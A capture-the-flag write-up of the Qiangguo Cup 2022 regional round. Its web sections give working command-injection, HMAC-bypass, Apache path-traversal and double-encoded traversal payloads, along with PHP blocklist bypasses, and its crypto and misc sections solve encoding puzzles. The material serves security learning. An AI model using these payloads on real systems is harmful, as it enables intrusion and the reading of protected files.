Qiangguo Cup (强国杯) 2022 Regional Round Writeup


Web

Execute command

Opening the target shows Apache's default "It works!" page and a Server banner of 2.4.49, which immediately suggests CVE-2021-41773: the path-traversal bug introduced in Apache HTTP Server 2.4.49 (and incompletely fixed in 2.4.50, CVE-2021-42013). It only reaches files outside the document root when the traversed directory is not protected by `Require all denied`, and turns into command execution only where mod_cgi is enabled.

[screenshot]

web_Huluwa

The challenge source is recovered from huluwa.mp3:

[screenshot]

if(empty($_POST['Huluxiaojinggang']) || empty($_POST['Shejing'])){
    die('看我四娃喷火!看我五娃喷水!');
}

$secret = getenv("secret");

if(isset($_POST['yeye']))
    $secret = hash_hmac('sha256', $_POST['yeye'], $secret);

$qwer = hash_hmac('sha256', $_POST['Shejing'], $secret);

if($qwer !== $_POST['Huluxiaojinggang']){
    die('看我大娃 正蹬,鞭腿,刺拳,训练有素。');
}

echo exec("nc".$_POST['Shejing']);

Shejing is appended to nc and handed to exec(), so it is the command-injection point; Huluxiaojinggang must equal the HMAC-SHA256 of Shejing under $secret. The unknown secret is dealt with by passing yeye as an array (yeye[]): on PHP 7, hash_hmac() rejects the array with a warning and returns NULL, so $secret becomes NULL and the second hash_hmac() runs with an empty key. (On PHP 8 the same call throws a TypeError, so this bypass depends on the challenge running PHP 7.) The expected tag can then be generated with the code's own logic:

<?php
$a = "|cat flag.php";
// getenv("secret") is unset on our own machine, so it returns false, which
// hash_hmac() coerces to the empty key: the same key the yeye[] trick leaves
// the server with.
var_dump(hash_hmac("sha256", $a, getenv("secret")));
// 342497a893ba4ea1b31fec268ee3a35539635831e08c2164327b328e26dbef44

yeye[]&Shejing=|cat flag.php&Huluxiaojinggang=342497a893ba4ea1b31fec268ee3a35539635831e08c2164327b328e26dbef44
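As an added example (not the challenge's or the writeup's code), the following Python models the server-side check and the payload builder side by side, so that the effect of yeye[] can be verified without the server. The secret handed to server_check() is a constructed stand-in for the unknown environment variable; the PHP 7 behaviour of hash_hmac() on a non-string argument is reproduced explicitly.

```python
# Added example: model of the Huluwa check and of the yeye[] bypass.
# The secret passed to server_check() is constructed; the server's real
# value is never needed, which is the whole point of the bypass.
import hashlib
import hmac
from urllib.parse import urlencode


def _b(v):
    return v.encode() if isinstance(v, str) else v


def php_hash_hmac(data, key):
    """hash_hmac('sha256', $data, $key) as PHP 7 behaves: a non-string $data
    (what yeye[] produces) triggers a warning and returns NULL; a NULL or
    false key is coerced to the empty string."""
    if not isinstance(data, (str, bytes)):
        return None
    key = b"" if key is None or key is False else _b(key)
    return hmac.new(key, _b(data), hashlib.sha256).hexdigest()


def server_check(post, secret):
    """Mirror of the PHP: returns the string exec() would run, or None on die()."""
    if not post.get("Huluxiaojinggang") or not post.get("Shejing"):
        return None
    if "yeye" in post:
        secret = php_hash_hmac(post["yeye"], secret)   # array -> NULL
    if php_hash_hmac(post["Shejing"], secret) != post["Huluxiaojinggang"]:
        return None
    return "nc" + post["Shejing"]


def build_payload(cmd_suffix):
    """yeye[] nulls $secret, so the tag the server expects is an HMAC under ''."""
    tag = hmac.new(b"", cmd_suffix.encode(), hashlib.sha256).hexdigest()
    return {"yeye": [""], "Shejing": cmd_suffix, "Huluxiaojinggang": tag}


def form_body(payload):
    """Encode like the writeup's request: yeye[] with no value, the rest as-is."""
    fields = {("yeye[]" if k == "yeye" else k): ("" if k == "yeye" else v)
              for k, v in payload.items()}
    return urlencode(fields)


if __name__ == "__main__":
    p = build_payload("|cat flag.php")
    print(form_body(p))
    print(server_check(p, b"server-only-secret"))   # nc|cat flag.php
```

Dropping yeye from the same payload makes server_check() fail, because the tag was computed under the empty key while the server still holds its real secret; that is exactly the difference the array trick makes.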

ikun

Opening the environment and viewing the page source makes it obvious that this is a file-read endpoint:

[screenshot]

The application appends a .jpeg suffix to whatever is submitted:

[screenshot]

After some testing, a ? turns out to truncate the suffix (presumably the value is treated as a URL, so everything after the ? becomes a query string and the appended .jpeg never reaches the file system):

[screenshot]

A bit more probing turns up the location and name of the flag:

/file?image=../../../../../?

[screenshot]

Trying to include it directly, the string flag appears to be filtered:

[screenshot]

Double URL-encoding gets around the filter: presumably the framework decodes the parameter once before the check sees it, and the file name is decoded once more before it is opened, so `flag` never appears literally while the check runs (a single layer of encoding would be undone before the check and still be caught). The encoded name below decodes once to %66%6c%61%67..., and twice to the flag file name seen in the listing:

/file?image=../../../../../%25%36%36%25%36%63%25%36%31%25%36%37%25%35%66%25%33%38%25%33%35%25%33%31%25%33%35%25%36%36%25%33%32%25%33%31%25%33%31%25%33%32%25%33%32%25%33%32%25%33%30?

[screenshot]
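The same ordering bug, "validate, then decode", underlies both the Apache 2.4.49 traversal that the Execute command challenge hints at (CVE-2021-41773: the URL was normalized before percent-decoding, so a `.%2e` segment was not recognised as `..`) and the ikun filter bypass above. The Python below is an added illustration written for this writeup, not Apache's code or the challenge's source: the document root, the filter word list and the "framework decodes once, something else decodes again" step are assumptions of the model. It also builds the double-encoded payload exactly as the request above was built.

```python
# Added example: the check-before-decode bug in two guises, with the fixed
# ordering beside each. ROOT and FORBIDDEN are constructed for the model.
from urllib.parse import unquote
import posixpath

ROOT = "/var/www"          # assumed document root
FORBIDDEN = ("flag",)      # assumed content of the ikun filter


def normalize(path):
    """Collapse '.'/'..' segments; also report any attempt to climb above '/'."""
    out, escaped = [], False
    for seg in path.split("/"):
        if seg in ("", "."):
            continue
        if seg == "..":
            if out:
                out.pop()
            else:
                escaped = True
        else:
            out.append(seg)
    return "/" + "/".join(out), escaped


def resolve_like_2449(url_path):
    """Normalize the still-encoded URL, then decode for the filesystem (the bug)."""
    norm, escaped = normalize(url_path)
    if escaped:
        return None                       # a literal '..' is rejected as expected
    # '.%2e' survived normalization and only now becomes '..'
    return posixpath.normpath(ROOT + unquote(norm))


def resolve_fixed(url_path):
    """Decode first, normalize second, and never serve outside ROOT."""
    decoded = unquote(url_path)
    if "%" in decoded:                    # a second encoding layer (cf. CVE-2021-42013)
        return None
    norm, escaped = normalize(decoded)
    if escaped:
        return None
    return posixpath.normpath(ROOT + norm)


def double_encode(name):
    """Percent-encode every character, then percent-encode the result again."""
    once = "".join(f"%{b:02x}" for b in name.encode())
    return "".join(f"%{b:02x}" for b in once.encode())


def ikun_vulnerable(raw_query_value):
    """Framework decodes once, app filters, then something decodes once more."""
    param = unquote(raw_query_value)
    if any(w in param for w in FORBIDDEN):
        return None
    return unquote(param)                 # 'flag' appears only after the check


def ikun_fixed(raw_query_value):
    """Decode to a fixed point before filtering; refuse endless encoding layers."""
    value = raw_query_value
    for _ in range(3):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    else:
        return None
    if any(w in value for w in FORBIDDEN):
        return None
    return value


if __name__ == "__main__":
    print(resolve_like_2449("/cgi-bin/.%2e/.%2e/.%2e/.%2e/etc/passwd"))  # /etc/passwd
    print(resolve_fixed("/cgi-bin/.%2e/.%2e/.%2e/.%2e/etc/passwd"))      # None
    print(double_encode("flag_8515f2112220"))
```

In both cases the fix is the same: canonicalize completely (decode until the value stops changing, then normalize) and only then apply the security check, rather than checking a representation that a later stage will still transform.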

guomi

Opening the environment, a hint shows up in the response headers. It left me baffled for a whole day; in the end the password turned out to be 123123. (guomi, 国密, is the usual shorthand for China's national commercial cryptography standards such as SM3 and SM4.)

Hint: select * from 'admin' where password=guomi($pass,true)

After logging in we are redirected to guomi.php, whose source mentions the parameters func and p:

[screenshot]

Passing arbitrary values, the error message reveals that call_user_func() is used under the hood:

[screenshot]

After a lot of poking around, every common command-execution function turned out to be disabled. Then it occurred to me that if execution is out, reading should still be possible, and readfile successfully returned the source of guomi.php:

/guomi.php?func=readfile&p=guomi.php

<?php
$disable_fun = array("file_get_contents","exec","shell_exec","system","ls","passthru","proc_open","cat /tmp/flagqlklg","tac /tmp/flagqlklg","more /tmp/flagqlklg","less /tmp/flagqlklg","show_source","phpinfo","popen","dl","eval","proc_terminate","touch","escapeshellcmd","escapeshellarg","assert","substr_replace","call_user_func_array","call_user_func","array_filter", "array_walk",  "array_map","registregister_shutdown_function","register_tick_function","filter_var", "filter_var_array", "uasort", "uksort", "array_reduce","array_walk", "array_walk_recursive","pcntl_exec","fopen","fwrite","file_put_contents");
function gettime($func, $p) {
    $result = call_user_func($func, $p);
    $a= gettype($result);
    if ($a == "string") {
        return $result;
    } else {return "";}
}
class Test {
    var $p = "Y-m-d h:i:s a";
    var $func = "date";
    function __destruct() {
        if ($this->func != "") {
            echo gettime($this->func, $this->p);
        }
    }
}
$func = $_REQUEST["func"];
$p = $_REQUEST["p"];

if ($func != null) {
    $func = strtolower($func);
    if (!in_array($func,$disable_fun)) {
        if (!in_array($p,$disable_fun)){
            echo gettime($func,$p);
        }else{
            die("you are Hacker....");
        }
        #echo gettime($func, $p);
    }else {
        die("you are Hacker...");
    }
}
?>

$disable_fun conveniently spells out where the flag lives ("cat /tmp/flagqlklg" and friends), so we read it directly:

/guomi.php?func=readfile&p=/tmp/flagqlklg

A few details make this work. Both $func and $p are compared as whole strings against the list, so /tmp/flagqlklg on its own is not blocked even though "cat /tmp/flagqlklg" is. readfile() returns the number of bytes read (an int), so gettime() returns "", but by then the file has already been written straight to the output. The list also shows the usual weaknesses of a function-name blocklist: show_source is blocked but its alias highlight_file is not, and the typo "registregister_shutdown_function" leaves register_shutdown_function unblocked.

Crypto

Mysterious Binary (神秘的二进制)

Convert the binary to hex and then to a string. The result looks like base64 but does not decode; it turned out the alphabet had been swapped, specifically the standard table rotated by 30 positions.

import base64

str1 = '1100110100010101010000001011110011001101010110010011000100101100110100010101100011001101011001011100010110100001110110010000010011010101010101001100110101001000110010010101010101100001010001011100010101011000110111010010000011010001000110001011110100011101110010010001100100001101010111001101110110101101111010010101000011001101010010011011010101100000110110011110000011011101000011001100100011000101010011'

# The bit string has lost its leading zero bits (it starts with '11' although the
# first byte is '3' = 0x33); int(..., 2) does not care, and rounding the byte count
# up restores the alignment. This avoids the odd-length hex string that
# bytes.fromhex(hex(...)[2:]) would choke on for other inputs.
str2 = int(str1, 2).to_bytes((len(str1) + 7) // 8, 'big').decode('utf-8')
# 3EP/3VLK4V3YqhvA5U3R2UXQqV7H4F/GrFCW7kzT3RmX6x7C21S

# The challenge used the standard alphabet rotated by 30; map each symbol back.
t = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/'
l = ""
for i in str2:
    l += t[(t.index(i) - 30) % 64]
# Restore the '=' padding that was stripped from the ciphertext.
if len(l) % 4 != 0:
    l = l + "=" * (4 - (len(l) % 4))
print(base64.b64decode(l).decode('utf-8'))

# flag{lkvz04bofscnr3wijxh6y8teug29q7da}
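Rather than guessing the shift, the search can be automated: try every rotation of the standard alphabet and keep the ones whose decoding contains the expected flag prefix. The block below is an added example written for this writeup, not the original solve script; it only covers rotated tables (an arbitrary 64-symbol permutation cannot be brute-forced this way) and reuses the writeup's intermediate string, while the short bit strings used to check bits_to_bytes() are constructed.

```python
# Added example: recover a rotated base64 alphabet by brute force.
# STR2 is the intermediate string from the writeup; marker assumed to be "flag{".
import base64
import string

STD = string.ascii_uppercase + string.ascii_lowercase + string.digits + "+/"
STR2 = "3EP/3VLK4V3YqhvA5U3R2UXQqV7H4F/GrFCW7kzT3RmX6x7C21S"


def bits_to_bytes(bits):
    """'0'/'1' text to bytes. The byte count is rounded up so a string that lost
    its leading zero bits (as the writeup's did) still decodes correctly."""
    bits = bits.strip()
    return int(bits, 2).to_bytes((len(bits) + 7) // 8, "big")


def rotate(s, shift):
    """Map each symbol of a table rotated by `shift` back to the standard table."""
    return "".join(STD[(STD.index(c) - shift) % 64] for c in s)


def pad(s):
    """Restore stripped '=' padding."""
    return s + "=" * (-len(s) % 4)


def find_rotations(ct, marker=b"flag{"):
    """Return {shift: plaintext} for every rotation whose decoding contains marker."""
    hits = {}
    for shift in range(64):
        try:
            pt = base64.b64decode(pad(rotate(ct, shift)))
        except ValueError:
            continue
        if marker in pt:
            hits[shift] = pt
    return hits


if __name__ == "__main__":
    for shift, pt in find_rotations(STR2).items():
        print(shift, pt)
```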

Misc

So Many Pictures (好多图图)

Rename the .docx to .zip and extract it: word/theme contains 1-30.png, and the 22nd image holds the flag. (A .docx is an OOXML zip; pictures in a normal document live under word/media, so thirty PNGs under word/theme stand out on their own.)

[screenshot]

The Joy of Encoding (编码的乐趣)

A straight chain of decoders: 与佛论禅 (Buddha-speak cipher) -> 社会主义核心价值观 (Core Socialist Values cipher) -> md5.

Listen to the audio

An online tool recovers the password hidden in the image, Gnfjj@g94:

[screenshot]

But that did not decrypt anything. The hint says it is a rail fence with 5 rails; the variant that finally worked was the W-shaped (zigzag) fence, which gives the real password Gfjg49@jn. Most online "rail fence" tools implement the grouped, column-reading variant instead, which is why the first attempts failed: the zigzag writes the text down and back up across the rails and reads it off rail by rail. With that password, MP3Stego extracts the hidden data.

MP3Stego's Decode -X writes the recovered text next to each file (1.mp3.txt, 2.mp3.txt):

.\Decode.exe -X .\1.mp3 -P 'Gfjg49@jn'
找到什么了?        (recovered text: "What did you find?")
.\Decode.exe -X .\2.mp3 -P 'Gfjg49@jn'
flag{atnmjkrobu840mghcnr3imtn4mf8rv8g}
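The zigzag rail fence that produced the password, as an added example written for this writeup rather than the tool the author used. It implements both directions and a brute force over the rail count, so the 5-rail hint can be confirmed instead of trusted; the strings are the ones from the challenge.

```python
# Added example: W-shaped (zigzag) rail fence, decode/encode and rail brute force.
def zigzag_order(n, rails):
    """For each ciphertext index, the plaintext position it was taken from.
    Positions are assigned to rails down-and-up with period 2*(rails-1); the
    ciphertext is read rail by rail, left to right within each rail."""
    if rails < 2:
        raise ValueError("need at least 2 rails")
    period = 2 * (rails - 1)
    rail_of = [min(i % period, period - i % period) for i in range(n)]
    return sorted(range(n), key=lambda i: rail_of[i])   # stable: keeps order in a rail


def rail_decode(ct, rails):
    pt = [""] * len(ct)
    for ct_idx, pt_idx in enumerate(zigzag_order(len(ct), rails)):
        pt[pt_idx] = ct[ct_idx]
    return "".join(pt)


def rail_encode(pt, rails):
    return "".join(pt[i] for i in zigzag_order(len(pt), rails))


def rail_bruteforce(ct):
    """Every candidate rail count, so the right one can be picked by eye."""
    return {r: rail_decode(ct, r) for r in range(2, len(ct))}


if __name__ == "__main__":
    for rails, candidate in rail_bruteforce("Gnfjj@g94").items():
        print(rails, candidate)          # 5 -> Gfjg49@jn
```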